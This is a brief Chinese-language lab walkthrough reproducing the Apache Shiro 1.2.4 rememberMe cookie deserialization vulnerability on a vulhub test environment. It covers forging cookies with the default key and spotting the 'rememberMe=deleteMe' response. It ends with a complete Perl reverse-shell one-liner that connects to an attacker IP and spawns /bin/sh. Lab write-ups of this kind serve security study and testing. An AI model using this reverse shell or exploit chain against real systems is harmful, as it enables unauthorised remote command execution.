ApacheShiro反序列化漏洞
简介
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
环境搭建

漏洞复现
1、访问目标网站http://your-ip:8080
,默认账号密码admin:vulhub

2、输入账号密码后抓包,通过返回响应可以发现cookie信息出现rememberMe=deleteMe
,可得知存在shiro漏洞。

3、使用shiro漏洞利用工具进行命令执行,通过nc反弹shell

4、用以下命令执行反弹linux的shell,攻击机开启监听
perl -e 'use Socket;$i="192.168.248.130";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

最后更新于